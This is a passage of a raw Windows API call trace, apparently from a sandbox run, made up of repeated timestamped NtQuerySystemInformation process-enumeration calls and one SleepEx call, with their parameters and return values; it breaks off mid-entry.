(in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0138.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1bf00) returned 0x0 [0138.232] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0140.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5f8) returned 0x0 [0140.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0140.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a5b8) returned 0x0 [0141.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19748) returned 0x0 [0141.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, 